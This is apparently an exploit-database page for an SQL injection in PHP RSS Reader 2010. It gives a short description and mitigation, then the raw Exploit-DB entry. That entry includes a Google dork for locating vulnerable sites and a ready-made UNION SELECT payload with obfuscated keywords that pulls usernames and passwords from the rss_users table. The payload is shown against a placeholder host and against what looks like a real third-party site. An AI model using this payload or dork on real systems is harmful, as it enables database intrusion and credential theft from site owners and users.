header-logo
Suggest Exploit
vendor:
PHP RSS Reader 2010
by:
rDNix
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP RSS Reader 2010
Affected Version From: 2010
Affected Version To: 2010
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

[PHP RSS READER 2010 SQLI]

A SQL injection vulnerability exists in the PHP RSS Reader 2010 application. An attacker can exploit this vulnerability to gain access to the application's database and extract sensitive information such as usernames and passwords. The vulnerability is due to the application not properly sanitizing user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This will cause the application to execute the malicious SQL statements and return the results of the query.

Mitigation:

To mitigate this vulnerability, the application should properly sanitize user-supplied input before using it in an SQL query.
Source

Exploit-DB raw data:

# Exploit Title: [PHP RSS READER 2010 SQLI]
# Google Dork: [Copyright 2010 - Powered By - PHP RSS Reader]
# Date: [28/10/2013]
# Exploit Author: [rDNix]
# Vendor Homepage: [http://www.phprssreader.com/]
# Version: [2010]

Exploit :-

http://www.site.com/[phprssreader]/null'%20/*!uNION*/%20/*!select*/%201,2,3,/*!concat(username,password)*/,5,6,7,8,9,10,11%20from%20rss_users--+<http://www.kt.com.kw/read2/null'%20/*!uNION*/%20/*!select*/%201,2,3,/*!concat(username,password)*/,5,6,7,8,9,10,11%20from%20rss_users--+>


By : rDNix
Contact : Mynamemishal@gmail.com

Navigation

Suggest Exploit

Services By CQR